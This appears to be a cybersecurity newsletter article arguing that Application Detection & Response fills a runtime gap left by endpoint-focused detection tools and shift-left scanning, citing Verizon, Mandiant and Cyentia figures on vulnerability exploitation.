How ADR Addresses Gaps in the Detection & Response Landscape
A look at the emerging category of "Application Detection & Response (ADR)"
Interested in sponsoring an issue of Resilient Cyber?
This includes reaching over 6,000 subscribers, ranging from Developers, Engineers, Architects, CISO’s/Security Leaders and Business Executives
Reach out below!
The concept of detection and response is far from new in cybersecurity. In fact, it is a core part of the NIST Cybersecurity Framework (CSF) and fundamental part of any sound cybersecurity program.
Source: NIST CSF
You must be able to both detect threats and malicious activity, and respond to them, regardless of where they occur. That’s where the challenge comes into play with the current Detection and Response landscape.
As we will discuss below, most detection and response tools and capabilities have been focused on things such as endpoints, networks, servers and more, all of which need coverage but one gap has largely been left, applications. That gap is now increasingly being targeted, as we see a rise in the role applications play in malicious activity.
For example, the latest Verizon Data Breach Investigations Report (DBIR) pointed out that while traditional attack vectors such as credential compromise and phishing still lead the pack, vulnerability exploitation saw a 180% growth from the previous year's report. Verizon stated that exploitation of vulnerabilities now accounts for 1/3rd of all incidents the DBIR sees.
Source: 2024 Verizon DBIR
Similarly, Mandiant’s M-Trend report for 2024 identified that exploitation represented the most prevalent initial attack vector for intrusions, playing a role in 38% of initial intrusions.
Source: Mandiant M-Trends 2024 Special Report
Endpoint Centric
We’ve got entire security product categories aimed at Detection and Response, such as Endpoint Detection & Response (EDR), Managed Detection and Response (MDR) and Extended Detection and Response (XDR). Rightfully so, as we have seen massive growth of trends such as the remote/distributed workforce, bring-your-own-device (BYoD) and more, all of which warrant attention on endpoints.
The focus on endpoints and targets such as the network, endpoints, cloud and data make sense but as evident from the reports cited above, attackers are increasingly targeting applications and their associated vulnerabilities for exploitation. This emphasizes the need for a detection and response capability that makes applications and their threats a priority.
Challenging Application Security Landscape
There are also several challenges in the AppSec landscape that further warrant a focus on ADR. They include the always fuzzy “shared responsibility model”, complexity of distributed systems and the ever increasing velocity of change.
In the shared responsibility model, not only is there the underlying cloud service provider (CSP) to consider, but there are external SaaS integrations, internal development and platform teams, as well as autonomous teams across the organization often leading to opaque seems with unclear responsibilities of where something begins and ends. Couple that with considerations around third-party dependencies, components and vulnerabilities to address.
Taking that further, the modern distributed nature of systems creates more opportunities for exploitation and abuse. One example is modern authentication and identity providers, each of which is a potential attack vector, and of which you have limited visibility due to not owning the underlying infrastructure and logging.
Last but not least is the reality that we’re dealing with an ever-increasing velocity of change. As the industry continues further adoption of DevOps and automation, software delivery cycles continue to accelerate, and that trend is only set to increase with the use of GenAI driven co-pilots. This makes it difficult for security tools to actually detect and respond to potential attacks due a lack of being able to differentiate benign from malicious behavioral application activity.
While tools such as Web Application Firewalls (WAF) and Runtime Application Self Protection (RASP) have historically been used to secure applications, they have their own drawbacks and challenges, such as maintaining complex constantly changing rulesets or being cumbersome to the point where they may impact application performance.
Modern Application Complexity
Modern applications can be incredibly complex, involving underlying hosting environments, Infrastructure-as-a-Service (IaaS) providers, Kubernetes, Containers, Microservices and various API calls. All of this complexity can be difficult to address with tools that don’t account for the full runtime context of applications.
Utilizing application context, service interactions, data flows and accounting for authentication activities can help you identify unexpected and potentially malicious behaviors, and also be more prepared to quickly contain, mitigate and remediate malicious activity, ultimately limiting the blast radius and impact of security incidents.
Vulnerability and Exploitation Context
Building on the comments above about false positives and developer toil is the reality that the overwhelming majority of vulnerability scanning tools lack the full context of runtime applications.
We know from sources such as Cyentia that only 4-6% of all vulnerabilities discovered are ever actually exploited.
Source: Cyentia’s Inaugural Study of EPSS Data and Performance
While some modern tools such as SCA are adding capabilities to identify if vulnerabilities are known to be exploited leveraging sources such as CISA Known Exploited Vulnerability (KEV) catalog, likely to be exploited, using the Exploit Prediction Scoring System (EPSS) or actually exploitable with capabilities such as reachability analysis, again the runtime context that ADR platforms can bring provide even further context.
Knowing that AppSec resources in most organizations are already stretched thin, with Developers far outnumbering Security staff, and Developers focused on competing interests such as deployment velocity further emphasizes the need to focus on what matters - that is, what truly poses risk to organizations, can be exploited and can reduce organizational risk.
Hyper Focus on Shifting “Left”
If you’ve been paying any attention in cybersecurity the last several years we’ve seen the big push to “shift security left”, as part of trends such as DevSecOps. The theory was/is that it is cheaper and more effective to identify and remediate vulnerabilities earlier in the software development lifecycle (SDLC) while they are both potentially cheaper to fix as well as before they are in production runtime environments where malicious actors can exploit them.
We’ve seen a proliferation of security scanning tools focused on these activities such as Static/Dynamic Application Security Testing (SAST/DAST), Software Composition Analysis (SCA), Secrets, Container Scanning, and more. While all of these tools have their place, the challenge is that runtime (reality) often can look much different than source or build phases in the SDLC, and they can often lack context of how complex applications work when running in production environments.
Additionally, many of these tools end up producing hundreds or thousands of findings, many of which lack context and need to be analyzed, discussed and addressed by engineering and development teams, inevitably draining scarce resources and adding lag time to key metrics such as meantime-to-deploy or how quickly developers can get code, features, and innovations into products and applications.
It isn’t that tools that focus on securing pre-runtime environments aren’t needed or effective as part of a modern application security program, but they aren’t sufficient on their own, hence leaving the gap of runtime Application Detection & Response (ADR).
While we’re looking left, attackers are looking right - right at production.